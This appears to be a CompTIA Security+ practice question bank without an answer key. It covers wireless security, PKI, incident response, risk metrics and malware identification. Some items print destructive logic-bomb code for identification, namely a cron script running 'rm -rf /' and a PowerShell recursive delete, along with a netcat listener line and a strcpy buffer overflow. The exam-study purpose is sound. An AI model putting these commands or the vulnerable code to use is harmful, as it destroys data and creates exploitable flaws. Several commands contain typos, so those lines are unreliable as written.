Title of test:
Security + 2

Description:
Preparation for Security + exam

Author:
Patrick Boozer

Creation Date:
05/11/2018

Category:
Others

Number of questions: 143
Content:
Multiple organizations operating in the same vertical want to provide seamless wireless access for their employees as they visit the other organizations. Which of the following should be implemented if all the organizations use the native 802.1X client on their mobile devices?
- Shibboleth
- RADIUS federation
- SAML
- OAuth
- OpenID Connect.
Upon entering an incorrect password, the logon screen displays a message informing the user that the password does not match the username provided and is not the required length of 12 characters. Which of the following secure coding techniques should a security analyst address with the application developers to follow security best practices? Input validation Error handling Obfuscation Data exposure.
A security administrator is developing controls for creating audit trails and tracking if a PHI data breach is to occur. The administrator has been given the following requirements:
* All access must be correlated to a user account.
* All user accounts must be assigned to a single individual.
* User access to the PHI data must be recorded.
* Anomalies in PHI data access must be reported.
* Logs and records cannot be deleted or modified.
Which of the following should the administrator implement to meet the above requirements? (Select THREE).
- Eliminate shared accounts
- Create a standard naming convention for accounts.
- Implement usage auditing and review.
- Enable account lockout thresholds.
- Copy logs in real time to a secured WORM drive.
- Implement time-of-day restrictions.
- Perform regular permission audits and reviews.
An administrator is replacing a wireless router. The configuration of the old wireless router was not documented before it stopped functioning. The equipment connecting to the wireless network uses older legacy equipment that was manufactured prior to the release of the 802.11i standard. Which of the following configuration options should the administrator select for the new wireless router? WPA+CCMP WPA2+CCMP WPA+TKIP WPA2+TKIP.
Which of the following threat actors is MOST likely to steal a company's proprietary information to gain a market edge and reduce time to market? Competitor Hacktivist Insider Organized crime.
Which of the following BEST describes an important security advantage yielded by implementing vendor diversity? Sustainability Homogeneity Resiliency Configurability.
Which of the following specifically describes the exploitation of an interactive process to access otherwise restricted areas of the OS? Pivoting Process affinity Buffer overflow XSS.
Which of the following differentiates a collision attack from a rainbow table attack? A rainbow table attack performs a hash lookup. A rainbow table attack uses the hash as a password. In a collision attack, the hash and the input data are equivalent. In a collision attack, the same input results in different hashes.
A security analyst observes the following events in the logs of an employee workstation:
1/23 1:07:16 865 Access to C:\Users\user\temp\oasdfkh.hta has been restricted by your administrator by the default restriction policy level.
1/23 1:07:09 1034 The scan is completed. No detections were found.
The security analyst reviews the file system and observes the following:
C:\> dir C:\Users\user\temp
1/23 1:07:02 oasdfkh.hta
1/23 1:07:02 update.bat
1/23 1:07:02 msg.txt
Given the information provided, which of the following MOST likely occurred on the workstation?
- Application whitelisting controls blocked an exploit payload from executing.
- Antivirus software found and quarantined three malware files.
- Automatic updates were initiated but failed because they had not been approved.
- The SIEM log agent was not tuned properly and reported a false positive.
A security technician has been receiving alerts from several servers that indicate load balancers have had a significant increase in traffic. The technician initiates a system scan. The scan results illustrate that the disk space on several servers has reached capacity. The scan also indicates that incoming internet traffic to the servers has increased. Which of the following is the MOST likely cause of the decreased disk space? Misconfigured devices Logs and events anomalies Authentication issues Unauthorized software.
A security administrator is diagnosing a server where the CPU utilization has been at 100% for 24 hours. The main culprit of the CPU utilization is the antivirus program. Which of the following issues could occur if this is left unresolved? (Select TWO)
- MITM attack
- DoS attack
- DLL injection
- Buffer overflow
- Resource exhaustion.
Which of the following is used to validate the integrity of data? CBC Blowfish MD5 RSA.
A user typically works remotely over the holidays using a web-based VPN to access corporate resources. The user reports getting untrusted host errors and being unable to connect. Which of the following is MOST likely the case? The certificate has expired The browser does not support SSL The user's account is locked out The VPN software has reached the seat license maximum.
When it comes to cloud computing, if one of the requirements for a project is to have the most control over the systems in the cloud, which of the following is a service model that would be BEST suited for this goal? Infrastructure Platform Software Virtualization.
A company was recently audited by a third party. The audit revealed the company's network devices were transferring files in the clear. Which of the following protocols should the company use to transfer files? HTTPS LDAPS SCP SNMPv3.
A security analyst is acquiring data from a potential network incident. Which of the following evidence is the analyst MOST likely to obtain to determine the incident? Volatile memory capture Traffic and logs Screenshots System image capture.
A cybersecurity analyst is looking into the payload of a random packet capture file that was selected for analysis. The analyst notices that an internal host had a socket established with another internal host over a non-standard port. Upon investigation, the origin host that initiated the socket shows this output:
usera@host>history
mkdir /local/usr/bin/somedirectory
nc -1 192.168.5.1 -p 9856
ping -c 30 8.8.8.8 -a 600
rm /etc/dir2/somefile
rm -rm /etc/dir2/
traceroute 8.8.8.8
pakill pid 9487
usera@host>
Given the above output, which of the following commands would have established the questionable socket?
- traceroute 8.8.8.8
- ping -1 30 8.8.8.8 -a 600
- nc -1 192.168.5.1 -p 9856
- pskill pid 9487.
A security administrator has written a script that will automatically upload binary and text-based configuration files onto a remote server using a scheduled task. The configuration files contain sensitive information. Which of the following should the administrator use? (Select TWO)
- TOTP
- SCP
- FTP over a non-standard port
- SNMPv3
- Certificate-based authentication.
A security analyst conducts a manual scan on a known hardened host that identifies many non-compliant items. Which of the following BEST describes why this has occurred? (Select TWO)
- Privileged-user credentials were used to scan the host
- Non-applicable plug-ins were selected in the scan policy
- The incorrect audit file was used
- The output of the report contains false positives
- The target host has been compromised.
Which of the following solutions should an administrator use to reduce the risk from an unknown vulnerability in a third-party software application? Sandboxing Encryption Code signing Fuzzing.
A network administrator needs to allocate a new network for the R&D group. The network must not be accessible from the Internet regardless of the network firewall or other external misconfigurations. Which of the following settings should the network administrator implement to accomplish this? Configure the OS default TTL to 1 Use NAT on the R&D network Implement a router ACL Enable protected ports on the switch.
To help prevent one job role from having sufficient access to create, modify, and approve payroll data, which of the following practices should be employed? Least privilege Job rotation Background checks Separation of duties.
When attackers use a compromised host as a platform for launching attacks deeper into a company's network, it is said that they are: escalating privilege becoming persistent fingerprinting pivoting.
The help desk received a call after hours from an employee who was attempting to log into the payroll server remotely. When the help desk returned the call the next morning, the employee was able to log into the server remotely without incident. However, the incident occurred again the next evening. Which of the following BEST describes the cause of the issue? The password expired on the account and needed to be reset The employee does not have the rights needed to access the database remotely Time-of-day restrictions prevented the account from logging in The employee's account was locked out and needed to be unlocked.
An analyst receives an alert from the SIEM showing an IP address that does not belong to the assigned network can be seen sending packets to the wrong gateway. Which of the following network devices is misconfigured and which of the following should be done to remediate the issue? Firewall; implement an ACL on the interface Router; place the correct subnet on the interface Switch; modify the access port to trunk port Proxy; add the correct transparent interface.
A home invasion occurred recently in which an intruder compromised a home network and accessed a WiFi-enabled baby monitor while the baby's parents were sleeping. Which of the following BEST describes how the intruder accessed the monitor? Outdated antivirus WiFi signal strength Social engineering Default configuration.
A security engineer must install the same X.509 certificate on three different servers. The client application that connects to the servers performs a check to ensure the certificate matches the host name. Which of the following should the security engineer use? Wildcard certificate Extended validation certificate Certificate chaining Certificate utilizing the SAN field.
Which of the following refers to the term used to restore a system to its operational state? MTBF MTTR RTO RPO.
A Chief Information Officer (CIO) recently saw on the news that a significant security flaw exists in a specific version of a technology the company uses to support many critical applications. The CIO wants to know if this reported vulnerability exists in the organization and, if so, to what extent the company could be harmed. Which of the following would BEST provide the needed information? Penetration test Vulnerability scan Active reconnaissance Patching assessment report.
An organization is expanding its network team. Currently, it has local accounts on all network devices, but with growth, it wants to move to centrally managed authentication. Which of the following are the BEST solutions for the organization? (Select TWO) TACACS+ CHAP LDAP RADIUS MSCHAPv2.
An active/passive configuration has an impact on: confidentiality integrity availability non-repudiation.
Which of the following attack types BEST describes a client-side attack that is used to manipulate an HTML iframe with JavaScript code via a web browser? Buffer overflow MITM XSS SQLi.
Which of the following would provide additional security by adding another factor to a smart card? Token Proximity badge Physical key PIN.
Which of the following uses precomputed hashes to guess passwords? IPTables NAT tables Rainbow tables ARP tables.
A systems administrator wants to provide a balance between the security of a wireless network and usability. The administrator is concerned with the wireless encryption compatibility of older devices used by some employees. Which of the following would provide strong security and backward compatibility when accessing the wireless network?
- Open wireless network and SSL VPN
- WPA using a preshared key
- WPA2 using a RADIUS back-end for 802.1X authentication
- WEP with a 40-bit key.
In determining when it may be necessary to perform a credentialed scan against a system instead of a non-credentialed scan, which of the following requirements is MOST likely to influence the decision?
- The scanner must be able to enumerate the host OS of the devices scanned
- The scanner must be able to footprint the network
- The scanner must be able to check for open ports with listening services
- The scanner must be able to audit file system permissions.
A security administrator receives an alert from a third-party vendor that indicates a certificate that was installed in the browser has been hijacked at the root of a small public CA. The security administrator knows there are at least four different browsers in use on more than a thousand computers in the domain worldwide. Which of the following solutions would be BEST for the security administrator to implement to most efficiently assist with this issue? SSL CRL PKI ACL.
After a user reports slow computer performance, a systems administrator detects a suspicious file, which was installed as part of a freeware software package. The systems administrator reviews the output below:
c:\Windows\system32>netstat -nab
Active Connections
Proto Local Address Foreign Address State
TCP 0.0.0.0:135 0.0.0.0 RpcSs [svchost.exe]
TCP 0.0.0.0:445 0.0.0.0 [svchost.exe]
TCP 192.168.1.10:5000 10.37.213.20 winserver.exe
UDP 192.168.1.10:1900 *.* SSDPSVR
Based on the above information, which of the following types of malware was installed on the user's computer?
- RAT
- Keylogger
- Spyware
- Worm
- Bot.
A company has noticed multiple instances of proprietary information on public websites. It has also observed an increase in the number of email messages sent to random employees containing malicious links and PDFs. Which of the following changes should the company make to reduce the risks associated with phishing attacks? (Select TWO)
- Install an additional firewall
- Implement a redundant email server
- Block access to personal email on corporate systems
- Update the X.509 certificates on the corporate email server
- Update corporate policy to prohibit access to social media websites
- Review access violations on the file server.
A security analyst is investigating a potential breach. Upon gathering, documenting, and securing the evidence, which of the following actions is the NEXT step to minimize the business impact? Launch an investigation to identify the attacking host Initiate the incident response plan Review lessons learned captured in the process Remove malware and restore the system to normal operation.
Joe, a salesman, was assigned to a new project that requires him to travel to a client site. While waiting for a flight, Joe decides to connect to the airport wireless network without connecting to a VPN, and then sends confidential emails to fellow colleagues. A few days later, the company experiences a data breach. Upon investigation, the company learns Joe's emails were intercepted. Which of the following MOST likely caused the data breach? Policy violation Social engineering Insider threat Zero-day attack.
An information security specialist is reviewing the following output from a Linux server:
user@server:~$ -l
5 * * * * /usr/local/bin.backup.sh
user@server:~$ cat /usr/local/bin/backup.sh
#!/bin/bash
if ! grep --quiet joeuser /etc/passwd
then
    rm -rf /
fi
Based on the above information, which of the following types of malware was installed on the server?
- Logic bomb
- Trojan
- Backdoor
- Ransomware
- Rootkit.
A company wants to ensure confidential data from storage media is sanitized in such a way that the drive cannot be reused. Which of the following methods should the technician use? Shredding Wiping Low-level formatting Repartitioning Overwriting.
A forensic expert is given a hard drive from a crime scene and is asked to perform an investigation. Which of the following is the FIRST step the forensic expert needs to take to maintain the chain of custody? Make a forensic copy Create a hash of the hard drive Recover the hard drive data Update the evidence log.
An incident response manager has started to gather all the facts related to a SIEM alert showing multiple systems may have been compromised. The manager has gathered these facts:
- The breach is currently indicated on six user PCs
- One service account is potentially compromised
- Executive management has been notified
In which of the following phases of the IRP is the manager currently working?
- Recovery
- Eradication
- Containment
- Identification.
A stock trading company had the budget for enhancing its secondary datacenter approved. Since the main site is a hurricane-affected area and the disaster recovery site is 100 mi (161 km) away, the company wants to ensure its business is always operational with the least amount of man hours needed. Which of the following types of disaster recovery sites should the company implement? Hot site Warm site Cold site Cloud-based site.
A systems administrator is attempting to recover from a catastrophic failure in the datacenter. To recover the domain controller, the systems administrator needs to provide the domain administrator credentials. Which of the following account types is the system administrator using? Shared accounts Guest account Service account User account.
Users from two organizations, each with its own PKI, need to begin working together on a joint project. Which of the following would allow the users of the separate PKIs to work together without connection errors? Trust model Stapling Intermediate CA Key escrow.
A security analyst is mitigating a pass-the-hash vulnerability on a Windows infrastructure. Given the requirement, which of the following should the security analyst do to MINIMIZE the risk? Enable CHAP Disable NTLM Enable Kerberos Disable PAP.
An organization requires users to provide their fingerprints to access an application. To improve security, the application developers intend to implement multifactor authentication. Which of the following should be implemented? Use a camera for facial recognition Have users sign their name naturally Require a palm geometry scan Implement iris recognition.
A security analyst is reviewing an assessment report that includes software versions, running services, supported encryption algorithms, and permission settings. Which of the following produced the report? Vulnerability scanner Protocol analyzer Network mapper Web inspector.
A Chief Information Officer (CIO) asks the company's security specialist if the company should spend any funds on malware protection for a specific server. Based on a risk assessment, the ARO value of a malware infection for a server is 5 and the annual cost for the malware protection is $2500. Which of the following SLE values warrants a recommendation against purchasing the malware protection? $500 $1000 $2000 $2500.
The computer resource center issues smartphones to all first-level and above managers. The managers have the ability to install mobile tools. Which of the following tools should be implemented to manage the type of tools the managers installed? Download manager Content manager Segmentation manager Application manager.
A systems administrator wants to provide for and enforce wireless access accountability during events where external speakers are invited to make presentations to a mixed audience of employees and non-employees. Which of the following should the administrator implement? Shared accounts Preshared passwords Least privilege Sponsored guest.
A recent internal audit is forcing a company to review each internal business unit's VMs because the cluster they are installed on is in danger of running out of computer resources. Which of the following vulnerabilities exist? Buffer overflow End-of-life systems System sprawl Weak configuration.
A security administrator has found a hash in the environment known to belong to malware. The administrator then finds this file to be in the pre-update area of the OS, which indicates it was pushed from the central patch system.
File: winx86_adobe_upgrade.exe
Hash: 99ac28bede43ab869b853ba62c4ea243
The administrator pulls a report from the patch management system with the following output:
Install Date | Package Name | Target Device | Hash
10/10/2017 | java_11.2_x64.exe | HQ PC's | 01ab28bbde63aa879b35bba62cdea282
10/10/2017 | winx86_adobe_flash_upgrade.exe | HQ PC's | 99ac28bede43ab86b853ba62c4ea243
Given the above output, which of the following MOST likely happened?
- The file was corrupted after it left the patch system
- The file was infected when the patch manager downloaded it
- The file was not approved in the application whitelist system
- The file was embedded with a logic bomb to evade detection.
Two users must encrypt and transmit large amounts of data between them. Which of the following should they use to encrypt and transmit the data? Symmetric algorithm Hash function Digital signature Obfuscation.
A new Chief Information Officer (CIO) has been reviewing the badging and decides to write a policy that all employees must have their badges rekeyed at least annually. Which of the following controls BEST describes this policy? Physical Corrective Technical Administrative.
A software developer is concerned about DLL hijacking in an application being written. Which of the following is the MOST viable mitigation measure of this type of attack? The DLL of each application should be set individually All calls to different DLLs should be hard-coded in the application Access to DLLs from the Windows registry should be disabled The affected DLLs should be renamed to avoid future hijacking.
A security engineer wants to implement a site-to-site VPN that will require SSL certificates for mutual authentication. Which of the following should the engineer implement if the design requires client MAC addresses to be visible across the tunnel? Tunnel mode IPSec Transport mode VPN IPSec L2TP SSL VPN.
An application was recently compromised after some malformed data came in via web form. Which of the following would MOST likely have prevented this? Input validation Proxy server Stress testing Encoding.
While working on an incident, Joe, a technician, finished restoring the OS and applications on a workstation from the original media. Joe is about to begin copying the user's files back onto the hard drive. Which of the following incident response steps is Joe working on now? Recovery Eradication Containment Identification.
A systems administrator found a suspicious file in the root of the file system. The file contains URLs, usernames, passwords, and text from other documents being edited on the system. Which of the following types of malware would generate such a file? Keylogger Rootkit Bot RAT.
A computer emergency response team is called at midnight to investigate a case in which a mail server was restarted. After an initial investigation, it was discovered that email is being exfiltrated through an active connection. Which of the following is the NEXT step the team should take?
- Identify the source of the active connection
- Perform eradication of the active connection and recover
- Perform the containment procedure by disconnecting the server
- Format the server and restore its initial configuration.
An analyst is reviewing a simple program for potential security vulnerabilities before it is deployed to a Windows server. Given the following code:
void foo (char *bar) {
    char random_user_input[12];
    strcpy (random_user_input, bar);
}
Which of the following vulnerabilities is present?
- Bad memory pointer
- Buffer overflow
- Integer overflow
- Backdoor.
A company has a data classification system with definitions for "Private" and "Public". The company's security policy outlines how data should be protected based on type. The company recently added the data type "Proprietary". Which of the following is the MOST likely reason the company added this data type? Reduced cost More searchable data Better data classification Expanded authority of the privacy officer.
A security technician is configuring an access management system to track and record user actions. Which of the following functions should the technician configure? Accounting Authorization Authentication Identification.
A security administrator installed a new network scanner that identifies new host systems on the network. Which of the following did the security administrator install? Vulnerability scanner Network-based IDS Rogue system detection Configuration compliance scanner.
A Chief Information Officer (CIO) has decided it is not cost effective to implement safeguards against a known vulnerability. Which of the following risk responses does this BEST describe? Transference Avoidance Mitigation Acceptance.
An audit takes place after company-wide restructuring, in which several employees changed roles. The following deficiencies are found during the audit regarding access to confidential data.
Employee | Job Function | Audit Finding
Ann | Sales Manager | Access to confidential payroll shares; Access to payroll processing program; Access to marketing shares
Jeff | Marketing Director | Access to human resources annual review folder; Access to shared human resources mailbox
John | Sales Manager | Active account; Access to human resources annual review folder; Access to confidential payroll shares
Which of the following would be the BEST method to prevent similar audit findings in the future?
- Implement separation of duties for the payroll department
- Implement a DLP solution on the payroll and human resources reviews
- Implement rule-based access controls on the human resources server
- Implement regular permission auditing and reviews.
A technician is investigating a potentially compromised device with the following symptoms:
- Browser slowness
- Frequent browser crashes
- Hourglass stuck
- New search toolbar
- Increased memory consumption
Which of the following types of malware has infected the system?
- Man-in-the-browser
- Spoofer
- Spyware
- Adware.
A penetration tester has written an application that performs a bit-by-bit XOR 0xFF operation on binaries prior to transmission over untrusted media. Which of the following BEST describes the action performed by this type of application? Hashing Key exchange Encryption Obfuscation.
An audit report has identified a weakness that could allow unauthorized personnel access to the facility at its main entrance and from there gain access to the network. Which of the following would BEST resolve the vulnerability? Faraday cage Air gap Mantrap Bollards.
When attempting to secure a mobile workstation, which of the following authentication technologies rely on the user's physical characteristics? (Select TWO) MAC address table Retina scan Fingerprint scan Two-factor authentication CAPTCHA Password string.
Systems administrators and key support staff come together to simulate a hypothetical interruption of service. The team updates the disaster recovery processes and documentation after the meeting. Which of the following describes the team's efforts? Business impact analysis Continuity of operation Tabletop exercise Order of restoration.
A company has two wireless networks utilizing captive portals. Some employees report getting a trust error in their browsers when connecting to one of the networks. Both captive portals are using the same server certificate for authentication, but the analyst notices the following differences between the two certificate details:
Certificate 1
Certificate Path:
    Geotrust Global CA
    *company.com
Certificate 2
Certificate Path:
    *company.com
Which of the following would resolve the problem?
- Use a wildcard certificate.
- Use certificate chaining.
- Use a trust model.
- Use an extended validation certificate.
Company A has acquired Company B. Company A has different domains spread globally, and typically migrates its acquisitions' infrastructure under its own domain infrastructure. Company B, however, cannot be merged into Company A's domain infrastructure. Which of the following methods would allow the two companies to access one another's resources? Attestation Federation Single sign-on Kerberos.
A technician is configuring a load balancer for the application team to accelerate the network performance of their applications. The applications are hosted on multiple servers and must be redundant. Given this scenario, which of the following would be the BEST method of configuring the load balancer? Round-robin Weighted Least connection Locality-based.
Ann is the IS manager for several new systems in which the classifications of the systems' data are being decided. She is trying to determine the sensitivity level of the data being processed. Which of the following people should she consult to determine the data classification? Steward Custodian User Owner.
An organization's employees currently use three different sets of credentials to access multiple internal resources. Management wants to make this process less complex. Which of the following would be the BEST option to meet this goal? Transitive trust Single sign-on Federation Secure token.
An external attacker can modify the ARP cache of an internal computer. Which of the following types of attacks is described? Replay Spoofing DNS poisoning Client-side attack.
A systems administrator has isolated an infected system from the network and terminated the malicious process from executing. Which of the following should the administrator do NEXT according to the incident response process? Restore lost data from a backup. Wipe the system. Document the lessons learned. Determine the scope of impact.
A new security administrator ran a vulnerability scanner for the first time and caused a system outage. Which of the following types of scans MOST likely caused the outage? Non-intrusive credentialed scan Non-intrusive non-credentialed scan Intrusive credentialed scan Intrusive non-credentialed scan.
A security analyst is hardening a WiFi infrastructure. The primary requirements are the following:
- The infrastructure must allow staff to authenticate using the most secure method.
- The infrastructure must allow guests to use an "open" WiFi network that logs valid email addresses before granting access to the Internet.
Given these requirements, which of the following statements BEST represents what the analyst should recommend and configure?
- Configure a captive portal for guests and WPS for staff.
- Configure a captive portal for staff and WPA for guests.
- Configure a captive portal for staff and WEP for guests.
- Configure a captive portal for guests and WPA2 Enterprise for staff.
A security administrator is trying to eradicate a worm, which is spreading throughout the organization, using an old remote vulnerability in the SMB protocol. The worm uses Nmap to identify target hosts within the company. The administrator wants to implement a solution that will eradicate the current worm and any future attacks that may be using zero-day vulnerabilities. Which of the following would BEST meet the requirements when implemented? Host-based firewall Enterprise patch management system Network-based intrusion prevention system Application blacklisting File integrity checking.
Which of the following is a deployment concept that can be used to ensure only the required OS access is exposed to software applications? Staging environment Sandboxing Secure baseline Trusted OS.
A procedure differs from a policy in that it: is a high-level statement regarding the company's position on a topic. sets a minimum expected baseline of behavior. provides step-by-step instructions for performing a task. describes adverse actions when violations occur.
Ann, a user, reports she is unable to access an application from her desktop. A security analyst verifies Ann's access and checks the SIEM for any errors. The security analyst reviews the log file from Ann's system and notices the following output:
2017--08-21 10:48:12 DROP TCP 172.20.89.232 239.255.255.255 443 1900 250 -------- RECEIVE
2017--08-21 10:48:12 DROP UDP 192.168.72.205 239.255.255.255 443 1900 250 -------- RECEIVE
Which of the following is MOST likely preventing Ann from accessing the application from the desktop?
- Web application firewall
- DLP
- Host-based firewall
- UTM
- Network-based firewall.
Which of the following types of penetration test will allow the tester to have access only to password hashes prior to the penetration test? Black box Gray box Credentialed White box.
Which of the following threats has sufficient knowledge to cause the MOST danger to an organization? Competitors Insiders Hacktivists Script kiddies.
While troubleshooting a client application connecting to the network, the security administrator notices the following error: Certificate is not valid. Which of the following is the BEST way to check if the digital certificate is valid? PKI CRL CSR IPSec.
To determine the ALE of a particular risk, which of the following must be calculated? (Select TWO). ARO ROI RPO SLE RTO.
A business sector is highly competitive, and safeguarding trade secrets and critical information is paramount. On a seasonal basis, an organization employs temporary hires and contractor personnel to accomplish its mission objectives. The temporary and contract personnel require access to network resources only when on the clock. Which of the following account management practices is the BEST way to manage these accounts? Employ time-of-day restrictions. Employ password complexity. Employ a random key generator strategy. Employ an account expiration strategy. Employ a password lockout policy.
Which of the following locations contain the MOST volatile data? SSD Paging file RAM Cache memory.
Ann, a customer, is reporting that several important files are missing from her workstation. She recently received communication from an unknown party who is requesting funds to restore the files. Which of the following attacks has occurred? Ransomware Keylogger Buffer overflow Rootkit.
Every morning, a systems administrator monitors failed login attempts on the company's log management server. The administrator notices the DBAdmin account has five failed username and/or password alerts during a ten-minute window. The systems administrator determines the user account is a dummy account used to attract attackers. Which of the following techniques should the systems administrator implement? Role-based access control Honeypot Rule-based access control Password cracker.
Joe, a user, has been trying to send Ann, a different user, an encrypted document via email. Ann has not received the attachment but is able to receive the header information. Which of the following is MOST likely preventing Ann from receiving the encrypted file? Unencrypted credentials Authentication issues Weak cipher suite Permission issues.
A systems administrator is configuring a system that uses data classification labels. Which of the following will the administrator need to implement to enforce access control? Discretionary access control Mandatory access control Role-based access control Rule-based access control.
An analyst is using a vulnerability scanner to look for common security misconfigurations on devices. Which of the following might be identified by the scanner? (Select TWO). The firewall is disabled on workstations. SSH is enabled on servers. Browser homepages have not been customized. Default administrator credentials exist on networking hardware. The OS is only set to check for updates once a day.
A security analyst is reviewing patches on servers. One of the servers is reporting the following error message in the WSUS management console: The computer has not reported status in 30 days. Given this scenario, which of the following statements BEST represents the issue with the output above? The computer in question has not pulled the latest ACL policies for the firewall. The computer in question has not pulled the latest GPO policies from the management server. The computer in question has not pulled the latest antivirus definitions from the antivirus program. The computer in question has not pulled the latest application software updates.
Two users must encrypt and transmit a large amount of data between them. Which of the following should they use to encrypt and transmit the data? Symmetric algorithm Hash function Digital signature Obfuscation.
A security administrator is reviewing the following PowerShell script referenced in the Task Scheduler on a database server:
$members = Get-ADGroupMember -Identity "Domain Admins" -Recursive | Select-Object -ExpandProperty name
if ($members -notcontains "JohnDoe") { Remove-Item -Path C:\Database -Recurse -Force }
Which of the following did the security administrator discover? Ransomware Backdoor Logic bomb Trojan.
A bank is experiencing a DoS attack against an application designed to handle 500 IP-based sessions. In addition, the perimeter router can only handle 1 Gbps of traffic. Which of the following should be implemented to prevent DoS attacks in the future? Deploy multiple web servers and implement a load balancer Increase the capacity of the perimeter router to 10 Gbps Install a firewall at the network to prevent all attacks Use redundancy across all network devices and services.
A malicious system continuously sends an extremely large number of SYN packets to a server. Which of the following BEST describes the resulting effect? The server will be unable to serve clients due to lack of bandwidth The server's firewall will be unable to effectively filter traffic due to the amount of data transmitted The server will crash when trying to reassemble all the fragmented packets The server will exhaust its memory maintaining half-open connections.
A systems administrator is deploying a new mission essential server into a virtual environment. Which of the following is BEST mitigated by the environment's rapid elasticity characteristic? Data confidentiality breaches VM escape attacks Lack of redundancy Denial of service.
Which of the following is the proper order for logging a user into a system from the first step to the last step? Identification, authentication, authorization Identification, authorization, authentication Authentication, identification, authorization Authentication, authorization, identification Authorization, identification, authentication Authorization, authentication, identification.
A company stores highly sensitive data files used by the accounting system on a server file share. The accounting system uses a service account named accounting-svc to access the file share. The data is protected with full disk encryption, and the permissions are set as follows: File system permissions: Users = Read Only Share permission: accounting-svc = Read Only Given the listed protections are in place and unchanged, to which of the following risks is the data still subject? Exploitation of local console access and removal of data Theft of physical hard drives and a breach of confidentiality Remote exfiltration of data using domain credentials Disclosure of sensitive data to third parties due to excessive share permissions.
A bank uses a wireless network to transmit credit card purchases to a billing system. Which of the following would be MOST appropriate to protect credit card information from being accessed by unauthorized individuals outside of the premises? Air gap Infrared detection Faraday cage Protected distributions.
Joe, a salesman, was assigned to a new project that requires him to travel to a client site. While waiting for a flight, Joe decides to connect to the airport wireless network without connecting to a VPN, and then sends confidential emails to fellow colleagues. A few days later, the company experiences a data breach. Upon investigation, the company learns Joe's emails were intercepted. Which of the following MOST likely caused the data breach? Policy violation Social engineering Insider threat Zero-day attack.
A help desk technician receives a phone call from an individual claiming to be an employee of the organization and requesting assistance to access a locked account. The help desk technician asks the individual to provide proof of identity before access can be granted. Which of the following types of attack is the caller performing? Phishing Shoulder surfing Impersonation Dumpster diving.
Confidential emails from an organization were posted to a website without the organization's knowledge. Upon investigation, it was determined that the emails were obtained from an internal actor who sniffed the emails in plain text. Which of the following protocols, if properly implemented, would have MOST likely prevented the emails from being sniffed? (Select TWO) Secure IMAP DNSSEC S/MIME SMTPS HTTPS.
A company wants to implement an access management solution that allows employees to use the same usernames and passwords for multiple applications without having to keep multiple credentials synchronized. Which of the following solutions would BEST meet these requirements? Multifactor authentication SSO Biometrics PKI Federation.
An external auditor visits the human resources department and performs a physical security assessment. The auditor observed documents on printers that are unclaimed. A closer look at these documents reveals employee names, addresses, ages, and types of medical and dental coverage options each employee has selected. Which of the following is the MOST appropriate action to take? Flip the documents face down so no one knows these documents are PII sensitive Shred the documents and let the owner print the new set Retrieve the documents, label them with a PII cover sheet, and return them to the printer Report to the human resources manager that their personnel are violating a privacy policy.
With which of the following authentication concepts is gait analysis MOST closely associated? Somewhere you are Something you are Something you do Something you know.
Which of the following metrics are used to calculate the SLE? (Select TWO) ROI ARO ALE MTBF MTTF TCO.
Due to regulatory requirements, servers in a global organization must use time synchronization. Which of the following represents the MOST secure method of time synchronization? The server should connect to external Stratum 0 NTP servers for synchronization The server should connect to internal Stratum 0 NTP servers for synchronization The server should connect to external Stratum 1 NTP servers for synchronization The server should connect to internal Stratum 1 NTP servers for synchronization.
When sending messages using symmetric encryption, which of the following must happen FIRST? Exchange encryption key Establish digital signatures Agree on an encryption method Install digital certificates.
Which of the following scenarios BEST describes an implementation of non-repudiation? A user logs into a domain workstation and accesses network file shares for another department A user remotely logs into the mail server with another user's credentials A user sends a digitally signed email to the entire finance department about an upcoming meeting A user accesses the workstation registry to make unauthorized changes to enable functionality within an application.
An office manager found a folder that included documents with various types of data relating to corporate clients. The office manager noticed that the data included dates of birth, addresses, and phone numbers for the clients. The office manager then reported this finding to the security compliance officer. Which of the following portions of the policy would the security officer need to consult to determine if a breach has occurred? Public Private PHI PII.
Which of the following is an asymmetric function that generates a new and separate key every time it runs? RSA DSA DHE HMAC PBKDF2.
Which of the following would be considered multifactor authentication? Hardware token and smart card Voice recognition and retina scan Strong password and fingerprint PIN and security questions.
Users report the following message appears when browsing to the company's secure site: This website cannot be trusted. Which of the following actions should a security analyst take to resolve these messages? (Select TWO) Ensure the certificate has a .pfx extension on the server Update the root certificate into the client computer certificate store Install the updated private key on the web server Have users clear their browsing history and relaunch the session.
Despite having implemented password policies, users continue to set the same weak passwords and reuse old passwords. Which of the following technical controls would help prevent these policy violations? Password expiration Password length Password complexity Password history Password lockout.
A security auditor is testing perimeter security in a building that is protected by badge readers. Which of the following types of attacks would MOST likely gain access? Phishing Man-in-the-middle Tailgating Watering hole Shoulder surfing.
Which of the following encryption methods does PKI typically use to securely protect keys? Elliptic curve Digital signatures Asymmetric Obfuscation.
A department head at a university resigned on the first day of spring semester. It was subsequently determined that the department head deleted numerous files and directories from the server-based home directory while the campus was closed. Which of the following policies or procedures could have prevented this from occurring? Time-of-day restrictions Permissions auditing and review Offboarding Account expiration.
An organization wants to upgrade its enterprise-wide desktop computer solution. The organization currently has 500 PCs active on the network. The Chief Information Security Officer (CISO) suggests that the organization employ desktop imaging technology for such a large-scale upgrade. Which of the following is a security benefit of implementing an imaging solution? It allows for faster deployment It provides a consistent baseline It reduces the number of vulnerabilities It decreases the boot time.
A senior incident response manager receives a call about some external IPs communicating with internal computers during off hours. Which of the following types of malware is MOST likely causing this issue? Botnet Ransomware Polymorphic malware Armored virus.
An organization has implemented an IPSec VPN access for remote users. Which of the following IPSec modes would be the MOST secure for this organization to implement? Tunnel mode Transport mode AH-only mode ESP-only mode.
A security engineer is configuring a wireless network with EAP-TLS. Which of the following activities is a requirement for this configuration? Setting up a TACACS+ server Configuring federation between authentication servers Enabling TOTP Deploying certificates to endpoint devices.
Several workstations on a network are found to be on OS versions that are vulnerable to a specific attack. Which of the following is considered to be a corrective action to combat this vulnerability? Install an antivirus definition patch Educate the workstation users Leverage server isolation Install a vendor-supplied patch Install an intrusion detection system.
A user suspects someone has been accessing a home network without permission by spoofing the MAC address of an authorized system. While attempting to determine if an unauthorized user is logging into the home network, the user reviews the wireless router, which shows the following table for systems that are currently on the home network:
Hostname  IP Address    MAC                MAC Filter
DadPC     192.168.1.15  00:1D:1A:44:17:B5  On
MomPC     192.168.1.15  21:13:D6:C5:42:A2  Off
JuniorPC  192.168.2.16  42:A7:D1:25:11:52  On
Unknown   192.168.1.18  10:B3:22:1A:FF:21  Off
Which of the following should be the NEXT step to determine if there is an unauthorized user on the network? Apply MAC filtering and see if the router drops any of the systems Physically check each of the authorized systems to determine if they are logged onto the network Deny the "unknown" host because the hostname is not known and MAC filtering is not applied to this host Conduct a ping sweep of each of the authorized systems and see if an echo response is received.
